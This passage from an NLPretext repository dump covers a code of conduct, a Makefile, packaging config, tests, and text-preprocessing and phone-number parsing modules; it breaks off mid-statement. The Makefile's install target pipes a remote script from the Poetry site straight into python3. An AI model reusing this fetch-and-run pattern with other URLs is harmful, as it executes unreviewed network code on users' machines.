or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at rafaelle.aygalenq@artefact.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | SHELL := /usr/bin/env bash 2 | 3 | IMAGE := nlpretext 4 | VERSION := latest 5 | 6 | NO_CHECK_FLAG = || true 7 | 8 | ifeq ($(STRICT), 1) 9 | POETRY_COMMAND_FLAG = 10 | PIP_COMMAND_FLAG = 11 | SAFETY_COMMAND_FLAG = 12 | BANDIT_COMMAND_FLAG = 13 | SECRETS_COMMAND_FLAG = 14 | BLACK_COMMAND_FLAG = 15 | DARGLINT_COMMAND_FLAG = 16 | ISORT_COMMAND_FLAG = 17 | MYPY_COMMAND_FLAG = 18 | else 19 | POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG) 20 | PIP_COMMAND_FLAG = $(NO_CHECK_FLAG) 21 | SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG) 22 | BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG) 23 | SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG) 24 | BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG) 25 | DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG) 26 | ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG) 27 | MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG) 28 | endif 29 | 30 | ifeq ($(POETRY_STRICT), 1) 31 | POETRY_COMMAND_FLAG = 32 | else ifeq ($(POETRY_STRICT), 0) 33 | POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG) 34 | endif 35 | 36 | ifeq ($(PIP_STRICT), 1) 37 | PIP_COMMAND_FLAG = 38 | else ifeq ($(PIP_STRICT), 0) 39 | PIP_COMMAND_FLAG = $(NO_CHECK_FLAG) 40 | endif 41 | 42 | ifeq ($(SAFETY_STRICT), 1) 43 | SAFETY_COMMAND_FLAG = 44 | else ifeq ($(SAFETY_STRICT), 0) 45 | SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG) 46 | endif 47 | 48 | ifeq ($(BANDIT_STRICT), 1) 49 | BANDIT_COMMAND_FLAG = 50 | else ifeq ($(BANDIT_STRICT), 0) 51 | BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG) 52 | endif 53 | 54 | ifeq ($(SECRETS_STRICT), 1) 55 | SECRETS_COMMAND_FLAG = 56 | else ifeq ($(SECRETS_STRICT), 0) 57 | SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG) 58 | endif 59 | 60 | ifeq ($(BLACK_STRICT), 1) 61 | BLACK_COMMAND_FLAG = 62 | else ifeq ($(BLACK_STRICT), 0) 63 | BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG) 64 | endif 65 | 66 | ifeq ($(DARGLINT_STRICT), 1) 67 | DARGLINT_COMMAND_FLAG = 68 | else ifeq ($(DARGLINT_STRICT), 0) 69 | DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG) 70 | endif 71 | 72 | ifeq ($(ISORT_STRICT), 1) 73 | ISORT_COMMAND_FLAG = 74 | else ifeq ($(ISORT_STRICT), 0) 75 | ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG) 76 | endif 77 | 78 | ifeq ($(MYPY_STRICT), 1) 79 | MYPY_COMMAND_FLAG = 80 | else ifeq ($(MYPY_STRICT), 0) 81 | MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG) 82 | endif 83 | 84 | .PHONY: download-poetry 85 | download-poetry: 86 | curl -sSL https://install.python-poetry.org | python3 - 87 | 88 | .PHONY: install 89 | install: 90 | poetry env use python3.10 91 | poetry lock -n 92 | poetry install -n 93 | ifneq ($(NO_PRE_COMMIT), 1) 94 | poetry run pre-commit install -t pre-commit -t pre-push 95 | endif 96 | 97 | .PHONY: check-safety 98 | check-safety: 99 | poetry check$(POETRY_COMMAND_FLAG) && \ 100 | poetry run pip check$(PIP_COMMAND_FLAG) && \ 101 | poetry run safety check --full-report$(SAFETY_COMMAND_FLAG) && \ 102 | poetry run bandit -r nlpretext/$(BANDIT_COMMAND_FLAG) 103 | 104 | .PHONY: gitleaks 105 | gitleaks: 106 | commits="$$(git rev-list --ancestry-path $$(git rev-parse $$(git branch -r --sort=committerdate | tail -1))..$$(git rev-parse HEAD))"; \ 107 | if [ "$${commits}" != "" ]; then docker run --rm -v $$(pwd):/code/ zricethezav/gitleaks --path=/code/ -v --commits=$$(echo $${commits} | paste -s -d, -)$(SECRETS_COMMAND_FLAG); fi; 108 | 109 | .PHONY: format-code 110 | format-code: 111 | poetry run pre-commit run --all 112 | 113 | .PHONY: test 114 | test: 115 | poetry run pytest 116 | 117 | .PHONY: lint 118 | lint: check-safety format-code test 119 | 120 | # Example: make docker VERSION=latest 121 | # Example: make docker IMAGE=some_name VERSION=1.0.4 122 | .PHONY: docker 123 | docker: 124 | @echo Building docker $(IMAGE):$(VERSION) ... 125 | docker build \ 126 | -t $(IMAGE):$(VERSION) . \ 127 | -f ./docker/Dockerfile 128 | 129 | # Example: make clean_docker VERSION=latest 130 | # Example: make clean_docker IMAGE=some_name VERSION=1.0.4 131 | .PHONY: clean_docker 132 | clean_docker: 133 | @echo Removing docker $(IMAGE):$(VERSION) ... 134 | docker rmi -f $(IMAGE):$(VERSION) 135 | 136 | .PHONY: clean_build 137 | clean_build: 138 | rm -rf build/ 139 | 140 | .PHONY: clean 141 | clean: clean_build clean_docker 142 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | # Poetry pyproject.toml: https://python-poetry.org/docs/pyproject/ 2 | 3 | [build-system] 4 | requires = ["poetry_core>=1.0.0"] 5 | build-backend = "poetry.core.masonry.api" 6 | 7 | [tool.poetry] 8 | name = "nlpretext" 9 | version = "1.2.2" 10 | description = "All the goto functions you need to handle NLP use-cases, integrated in NLPretext" 11 | readme = "README.md" 12 | authors = [ 13 | "artefactory " 14 | ] 15 | license = "Apache Software License 2.0" 16 | repository = "https://github.com/artefactory/NLPretext" 17 | homepage = "https://github.com/artefactory/NLPretext" 18 | 19 | # Keywords description https://python-poetry.org/docs/pyproject/#keywords 20 | keywords = [] # Update me 21 | 22 | # Pypi classifiers: https://pypi.org/classifiers/ 23 | classifiers = [ # Update me 24 | "Development Status :: 3 - Alpha", 25 | "Intended Audience :: Developers", 26 | "Operating System :: OS Independent", 27 | "Topic :: Software Development :: Libraries :: Python Modules", 28 | ] 29 | 30 | [tool.poetry.scripts] 31 | # Entry points for the package https://python-poetry.org/docs/pyproject/#scripts 32 | "nlpretext" = "nlpretext.cli.__main__:app" 33 | 34 | [tool.poetry.dependencies] 35 | python = ">=3.8,<3.11" 36 | typer = {extras = ["all"], version = ">=0.3.2"} 37 | rich = ">=10.1" 38 | chardet = ">=3.0.4" 39 | emoji = ">=2.0.0" 40 | flashtext = ">=2.7" 41 | ftfy = ">=4.2.0" 42 | mosestokenizer = ">=1.1.0" 43 | nlpaug = ">=1.0.1" 44 | nltk = ">=3.4.2" 45 | numpy = "^1.22" 46 | phonenumbers = ">=8.10.12" 47 | regex = ">=2019.8.19" 48 | sacremoses = ">=0.0.13" 49 | scikit-learn = ">=0.23.2, <2" 50 | spacy = ">=3.0.5" 51 | pillow = ">=8.2.1" 52 | thinc = ">=8.0.4" 53 | stop-words = ">=2018.7.23" 54 | pandas = ">=1.3,<3.0" 55 | pyarrow = ">=4.0.0" 56 | fastparquet = ">=0.4.1" 57 | dask = {version = ">=2021.5.0", extras = ["complete"], optional = true} 58 | distributed = {version = ">=2021.5.0", extras = ["complete"], optional = true} 59 | tornado = ">=6.0.3" 60 | torch = {version = "^1.9.0", optional = true} 61 | 62 | [tool.poetry.group.dev.dependencies] 63 | isort = ">=5.8.0" 64 | pyupgrade = ">=2.12.0" 65 | black = ">=20.8b1" 66 | ruff = "^0.1.5" 67 | mypy = ">=0.812" 68 | bandit = ">=1.7.0" 69 | safety = ">=1.10.3" 70 | pytest = ">=6.2.1" 71 | pytest-cov = ">=2.10.1" 72 | coverage = ">=5.3" 73 | pre-commit = ">=2.12.0" 74 | mypy-extensions = ">=0.4.3" 75 | types-emoji = ">=1.2.2" 76 | types-chardet = ">=0.1.3" 77 | types-click = ">=7.1.2" 78 | 79 | 80 | [tool.poetry.group.docs.dependencies] 81 | nbsphinx = ">=0.8.0" 82 | notebook = ">=6.1.5" 83 | Pygments = ">=2.8.0" 84 | recommonmark=">=0.7.1" 85 | Sphinx = ">=3.5.4" 86 | sphinx-gallery = ">=0.8.1" 87 | sphinxcontrib-applehelp = ">=1.0.2" 88 | sphinxcontrib-devhelp = ">=1.0.2" 89 | sphinxcontrib-htmlhelp = ">=1.0.3" 90 | sphinxcontrib-jsmath = ">=1.0.1" 91 | sphinxcontrib-qthelp = ">=1.0.3" 92 | sphinxcontrib-serializinghtml = ">=1.1.4" 93 | sphinx-autodoc-typehints = ">=1.11.1" 94 | sphinx_rtd_theme = ">=0.5.2" 95 | sphinx-multiversion-pre-post-build = ">=0.2.4" 96 | 97 | 98 | [tool.poetry.extras] 99 | torch = ["torch"] 100 | dask = ["dask", "distributed"] 101 | 102 | [tool.black] 103 | # https://github.com/psf/black 104 | line-length = 100 105 | target-version = ["py38"] 106 | 107 | [tool.isort] 108 | # https://github.com/timothycrosley/isort/ 109 | profile = "black" 110 | known_typing = "typing,types,typing_extensions,mypy,mypy_extensions" 111 | sections = "FUTURE,TYPING,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER" 112 | default_section = "FIRSTPARTY" 113 | force_grid_wrap = 0 114 | line_length = 100 115 | 116 | 117 | [tool.ruff] 118 | ignore = [ 119 | "D100", 120 | "D101", 121 | "D106", 122 | "D205", 123 | "D400", 124 | "D415", 125 | "D401", 126 | ] 127 | line-length = 100 128 | select = ["B", "C", "D", "E", "F", "W"] 129 | 130 | [tool.ruff.pydocstyle] 131 | convention = "numpy" 132 | 133 | [tool.ruff.per-file-ignores] 134 | "*cli.py" = ["D", "B008"] 135 | "*__init__.py" = [ 136 | "F401", 137 | "D100", 138 | "D101", 139 | "D103", 140 | "D104", 141 | "D105", 142 | "D106", 143 | "D107", 144 | ] 145 | "tests/*" = ["D", "E501"] 146 | -------------------------------------------------------------------------------- /tests/test_file_loader.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | import os 17 | import re 18 | 19 | import numpy as np 20 | import pytest 21 | from nlpretext._utils.file_loader import check_text_file_format, detect_encoding 22 | 23 | TESTDOC_LATIN1 = "J'aime les frites bien grasse étalon châpeau!" 24 | TESTDOC_UTF8 = "Un deuxième exemple de texte en utf-8 cette fois!" 25 | 26 | 27 | def create_files(): 28 | encoded_s = TESTDOC_LATIN1.encode("latin-1") 29 | with open("testdoc_latin1.txt", "wb") as f: 30 | f.write(encoded_s) 31 | 32 | encoded_s = TESTDOC_UTF8.encode("utf-8") 33 | with open("testdoc_utf8.txt", "wb") as f: 34 | f.write(encoded_s) 35 | return True 36 | 37 | 38 | def test_detect_encoding(): 39 | create_files() 40 | expected = {"encoding": "ISO-8859-1", "confidence": 0.73, "language": ""} 41 | result = detect_encoding("testdoc_latin1.txt") 42 | np.testing.assert_equal(result, expected) 43 | remove_files() 44 | 45 | 46 | def remove_files(): 47 | os.remove("testdoc_latin1.txt") 48 | os.remove("testdoc_utf8.txt") 49 | 50 | 51 | @pytest.mark.parametrize( 52 | "input_filepath, raising, expected_str", 53 | [ 54 | ("hello.csv", False, "csv"), 55 | ("folder/hello.csv", False, "csv"), 56 | ("gs://folder/hello.csv", False, "csv"), 57 | ("s3://folder/hello.csv", False, "csv"), 58 | ("hdfs://folder/hello.csv", False, "csv"), 59 | ("az://folder/hello.csv", False, "csv"), 60 | ("wildcards/*.csv", False, "csv"), 61 | ("compressed/gz/text.csv.gz", False, "csv"), 62 | ("compressed/zip/text.csv.zip", False, "csv"), 63 | (["hello.csv"], False, "csv"), 64 | (["hello.csv", "compressed.csv.gz"], False, "csv"), 65 | (["hello.csv", "other/folder/hello.csv"], False, "csv"), 66 | ("hello.json", False, "json"), 67 | ("folder/hello.json", False, "json"), 68 | ("gs://folder/hello.json", False, "json"), 69 | (["hello.json", "folder/hello.json"], False, "json"), 70 | ("hello.txt", False, "txt"), 71 | ("folder/hello.txt", False, "txt"), 72 | ("gs://folder/hello.txt", False, "txt"), 73 | (["hello.txt", "gs://folder/hello.txt"], False, "txt"), 74 | ("hello.parquet", False, "parquet"), 75 | ("folder/hello.parquet", False, "parquet"), 76 | ("gs://folder/hello.parquet", False, "parquet"), 77 | (["hello.parquet", "gs://folder/hello.parquet"], False, "parquet"), 78 | ( 79 | "gs://folder/hello.notaformat", 80 | True, 81 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted", 82 | ), 83 | ( 84 | "gs://folder/hello.gz", 85 | True, 86 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted", 87 | ), 88 | ( 89 | "gs://folder/hello.zip", 90 | True, 91 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted", 92 | ), 93 | ( 94 | "folder/*", 95 | True, 96 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted", 97 | ), 98 | ( 99 | ["hello.txt", "gs://folder/hello.csv"], 100 | True, 101 | re.escape("Multiple file formats found in file path list: ['txt', 'csv']"), 102 | ), 103 | ], 104 | ) 105 | def test_check_text_file_format(input_filepath, raising, expected_str): 106 | if raising: 107 | with pytest.raises(ValueError, match=expected_str): 108 | check_text_file_format(input_filepath) 109 | else: 110 | result = check_text_file_format(input_filepath) 111 | assert result == expected_str 112 | -------------------------------------------------------------------------------- /nlpretext/social/preprocess.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | 17 | from typing import List, Tuple 18 | 19 | import emoji as _emoji 20 | from nlpretext._config import constants 21 | from nlpretext.basic.preprocess import normalize_whitespace 22 | 23 | 24 | def remove_mentions(text: str) -> str: 25 | """ 26 | Function that removes words preceded with a '@'. 27 | 28 | Parameters 29 | ---------- 30 | text : str 31 | 32 | Returns 33 | ------- 34 | string 35 | """ 36 | text = normalize_whitespace(constants.AT_PATTERN.sub("", text)) 37 | return text 38 | 39 | 40 | def extract_mentions(text: str) -> List[str]: 41 | """ 42 | Function that extracts words preceded with a '@' 43 | eg. "I take care of my skin with @thisproduct" --> ["@thisproduct"]. 44 | 45 | Parameters 46 | ---------- 47 | text : str 48 | 49 | Returns 50 | ------- 51 | string 52 | """ 53 | return constants.AT_PATTERN.findall(text) 54 | 55 | 56 | def remove_html_tags(text: str) -> str: 57 | """ 58 | Function that removes words between < and >. 59 | 60 | Parameters 61 | ---------- 62 | text : str 63 | 64 | Returns 65 | ------- 66 | string 67 | """ 68 | text = normalize_whitespace(constants.HTML_TAG_PATTERN.sub("", text)) 69 | return text 70 | 71 | 72 | def remove_emoji(text: str) -> str: 73 | """ 74 | Remove emoji from any str by stripping any unicode in the range of Emoji unicode 75 | as defined in the unicode convention: 76 | http://www.unicode.org/emoji/charts/full-emoji-list.html. 77 | 78 | Parameters 79 | ---------- 80 | text : str 81 | 82 | Returns 83 | ------- 84 | str 85 | """ 86 | text = _emoji.replace_emoji(text, "") 87 | return text 88 | 89 | 90 | # TODO: replace mutable default value : 91 | # https://docs.quantifiedcode.com/python-anti-patterns/correctness/mutable_default_value_as_argument.html 92 | def convert_emoji_to_text(text: str, code_delimiters: Tuple[str, str] = (":", ":")) -> str: 93 | """ 94 | Convert emoji to their CLDR Short Name, according to the unicode convention 95 | http://www.unicode.org/emoji/charts/full-emoji-list.html 96 | eg. 😀 --> :grinning_face: 97 | 98 | Parameters 99 | ---------- 100 | text : str 101 | code_delimiters : tuple of symbols around the emoji code. 102 | eg: (':',':') --> :grinning_face: 103 | 104 | Returns 105 | ------- 106 | str 107 | string 108 | """ 109 | return _emoji.demojize(text, delimiters=code_delimiters) 110 | 111 | 112 | def extract_emojis(text: str) -> List[str]: 113 | """ 114 | Function that extracts emojis from a text and translates them into words 115 | eg. "I take care of my skin 😀 :(" --> [":grinning_face:"]. 116 | 117 | Parameters 118 | ---------- 119 | text : str 120 | 121 | Returns 122 | ------- 123 | list 124 | list of all emojis converted with their unicode conventions 125 | """ 126 | emojis_in_text = _emoji.emoji_list(text) 127 | emojis_converted = [ 128 | convert_emoji_to_text(emoji_text.get("emoji", "")) for emoji_text in emojis_in_text 129 | ] 130 | return emojis_converted 131 | 132 | 133 | def extract_hashtags(text: str) -> List[str]: 134 | """ 135 | Function that extracts words preceded with a '#' 136 | eg. "I take care of my skin #selfcare#selfestim" --> ["skincare", "selfestim"]. 137 | 138 | Parameters 139 | ---------- 140 | text : str 141 | 142 | Returns 143 | ------- 144 | list 145 | list of all hashtags 146 | """ 147 | return constants.HASHTAG_PATTERN.findall(text) 148 | 149 | 150 | def remove_hashtag(text: str) -> str: 151 | """ 152 | Function that removes words preceded with a '#' 153 | eg. "I take care of my skin #selfcare#selfestim" --> "I take care of my skin". 154 | 155 | Parameters 156 | ---------- 157 | text : str 158 | 159 | Returns 160 | ------- 161 | str 162 | text of a post without hashtags 163 | """ 164 | text = normalize_whitespace(constants.HASHTAG_PATTERN.sub("", text)) 165 | return text 166 | -------------------------------------------------------------------------------- /docs/make.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | REM Command file for Sphinx documentation 4 | 5 | if "%SPHINXBUILD%" == "" ( 6 | set SPHINXBUILD=sphinx-build 7 | ) 8 | set BUILDDIR=build 9 | set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% . 10 | if NOT "%PAPER%" == "" ( 11 | set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS% 12 | ) 13 | 14 | if "%1" == "" goto help 15 | 16 | if "%1" == "help" ( 17 | :help 18 | echo.Please use `make ^` where ^ is one of 19 | echo. html to make standalone HTML files 20 | echo. dirhtml to make HTML files named index.html in directories 21 | echo. singlehtml to make a single large HTML file 22 | echo. pickle to make pickle files 23 | echo. json to make JSON files 24 | echo. htmlhelp to make HTML files and a HTML help project 25 | echo. qthelp to make HTML files and a qthelp project 26 | echo. devhelp to make HTML files and a Devhelp project 27 | echo. epub to make an epub 28 | echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter 29 | echo. text to make text files 30 | echo. man to make manual pages 31 | echo. changes to make an overview over all changed/added/deprecated items 32 | echo. linkcheck to check all external links for integrity 33 | echo. doctest to run all doctests embedded in the documentation if enabled 34 | goto end 35 | ) 36 | 37 | if "%1" == "clean" ( 38 | for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i 39 | del /q /s %BUILDDIR%\* 40 | goto end 41 | ) 42 | 43 | if "%1" == "html" ( 44 | %SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html 45 | echo. 46 | echo.Build finished. The HTML pages are in %BUILDDIR%/html. 47 | goto end 48 | ) 49 | 50 | if "%1" == "dirhtml" ( 51 | %SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml 52 | echo. 53 | echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml. 54 | goto end 55 | ) 56 | 57 | if "%1" == "singlehtml" ( 58 | %SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml 59 | echo. 60 | echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml. 61 | goto end 62 | ) 63 | 64 | if "%1" == "pickle" ( 65 | %SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle 66 | echo. 67 | echo.Build finished; now you can process the pickle files. 68 | goto end 69 | ) 70 | 71 | if "%1" == "json" ( 72 | %SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json 73 | echo. 74 | echo.Build finished; now you can process the JSON files. 75 | goto end 76 | ) 77 | 78 | if "%1" == "htmlhelp" ( 79 | %SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp 80 | echo. 81 | echo.Build finished; now you can run HTML Help Workshop with the ^ 82 | .hhp project file in %BUILDDIR%/htmlhelp. 83 | goto end 84 | ) 85 | 86 | if "%1" == "qthelp" ( 87 | %SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp 88 | echo. 89 | echo.Build finished; now you can run "qcollectiongenerator" with the ^ 90 | .qhcp project file in %BUILDDIR%/qthelp, like this: 91 | echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Mapnik.qhcp 92 | echo.To view the help file: 93 | echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Mapnik.ghc 94 | goto end 95 | ) 96 | 97 | if "%1" == "devhelp" ( 98 | %SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp 99 | echo. 100 | echo.Build finished. 101 | goto end 102 | ) 103 | 104 | if "%1" == "epub" ( 105 | %SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub 106 | echo. 107 | echo.Build finished. The epub file is in %BUILDDIR%/epub. 108 | goto end 109 | ) 110 | 111 | if "%1" == "latex" ( 112 | %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex 113 | echo. 114 | echo.Build finished; the LaTeX files are in %BUILDDIR%/latex. 115 | goto end 116 | ) 117 | 118 | if "%1" == "text" ( 119 | %SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text 120 | echo. 121 | echo.Build finished. The text files are in %BUILDDIR%/text. 122 | goto end 123 | ) 124 | 125 | if "%1" == "man" ( 126 | %SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man 127 | echo. 128 | echo.Build finished. The manual pages are in %BUILDDIR%/man. 129 | goto end 130 | ) 131 | 132 | if "%1" == "changes" ( 133 | %SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes 134 | echo. 135 | echo.The overview file is in %BUILDDIR%/changes. 136 | goto end 137 | ) 138 | 139 | if "%1" == "linkcheck" ( 140 | %SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck 141 | echo. 142 | echo.Link check complete; look for any errors in the above output ^ 143 | or in %BUILDDIR%/linkcheck/output.txt. 144 | goto end 145 | ) 146 | 147 | if "%1" == "doctest" ( 148 | %SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest 149 | echo. 150 | echo.Testing of doctests in the sources finished, look at the ^ 151 | results in %BUILDDIR%/doctest/output.txt. 152 | goto end 153 | ) 154 | 155 | :end 156 | -------------------------------------------------------------------------------- /nlpretext/_utils/phone_number.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | from typing import List, Optional 19 | 20 | import phonenumbers as _phonenumbers 21 | from nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY 22 | 23 | 24 | def find_phone_numbers(string: str, region_code: Optional[str] = None) -> List[str]: 25 | """ 26 | Python port of Google's libphonenumber. 27 | https://github.com/daviddrysdale/python-phonenumbers. 28 | 29 | Parameters 30 | ---------- 31 | region_code : str, optional 32 | If specified, will find the number of the specified country. 33 | eg. 06.00.00.00.00 if "FR" is specified. 34 | 35 | If not specified, only works for international-formatted phone numbers. 36 | - ie. phone number with +country code specified 37 | eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work. 38 | supported value: look SUPPORTED_COUNTRY variable. 39 | 40 | Returns 41 | ------- 42 | list 43 | list of matched phone numbers. 44 | 45 | Raises 46 | ------ 47 | ValueError 48 | if country code is not supported. 49 | """ 50 | if region_code not in SUPPORTED_COUNTRY: 51 | raise ValueError("Please enter a valid contry code. See SUPPORTED_COUNTRY list.") 52 | return [match.raw_string for match in _phonenumbers.PhoneNumberMatcher(string, region_code)] 53 | 54 | 55 | def extract_phone_numbers(text: str, countrylist: List[Optional[str]]) -> List[str]: 56 | """ 57 | Find phone numbers in a text, returns a list of phone numbers. 58 | 59 | Parameters 60 | ---------- 61 | text : str 62 | countrylist : list (eg. [None,'FR','US','GB']) 63 | Look for phone numbers formatted according to the specified countlist. 64 | supported value: look SUPPORTED_COUNTRY variable. 65 | 66 | Returns 67 | ------- 68 | list 69 | List of unique phone numbers found. 70 | """ 71 | all_phone_numbers: List[str] = [] 72 | for country in countrylist: 73 | new_numbers_founds = find_phone_numbers(text, region_code=country) 74 | all_phone_numbers.extend(new_numbers_founds) 75 | return list(set(all_phone_numbers)) 76 | 77 | 78 | class PhoneParser: 79 | """ 80 | Python port of Google's libphonenumber. 81 | https://github.com/daviddrysdale/python-phonenumbers. 82 | """ 83 | 84 | def __init__(self): 85 | self.region_code = None 86 | self.text = None 87 | self.parsed_num: Optional[_phonenumbers.PhoneNumber] = None 88 | 89 | @property 90 | def parsed_num(self) -> Optional[_phonenumbers.PhoneNumber]: 91 | return self.__parsed_num 92 | 93 | @parsed_num.setter 94 | def parsed_num(self, value: Optional[_phonenumbers.PhoneNumber]) -> None: 95 | self.__parsed_num = value 96 | 97 | def parse_number( 98 | self, text: str, region_code: Optional[str] = None 99 | ) -> Optional[_phonenumbers.PhoneNumber]: 100 | """ 101 | Extract phone number from text. 102 | 103 | Parameters 104 | ---------- 105 | text: str 106 | region_code : str, optional 107 | If specified, will find the number of the specified country. 108 | eg. 06.00.00.00.00 if "FR" is specified. 109 | If not specified, only works for international-formatted phone numbers. 110 | - ie. phone number with +country code specified 111 | eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work. 112 | supported value: look SUPPORTED_COUNTRY variable. 113 | 114 | Returns 115 | ------- 116 | str 117 | The parsed number 118 | 119 | Raises 120 | ------ 121 | NumberParseException 122 | If the string doesn't contains phone number of is the parser fails. 123 | """ 124 | self.region_code = region_code 125 | self.text = text 126 | self.parsed_num: Optional[_phonenumbers.PhoneNumber] = _phonenumbers.parse( 127 | self.text, self.region_code 128 | ) 129 | return self.parsed_num 130 | 131 | def format_number(self, num_format: str) -> str: 132 | """ 133 | Convert a phone number to another standard format. 134 | 135 | Parameters 136 | ---------- 137 | num_format : str {'E164','INTERNATIONAL','NATIONAL','RFC3966'} 138 | 139 | Returns 140 | ------- 141 | str 142 | Number formatted 143 | """ 144 | standard_format = FORMAT_NUMBERS.get(num_format) 145 | if standard_format is None: 146 | raise 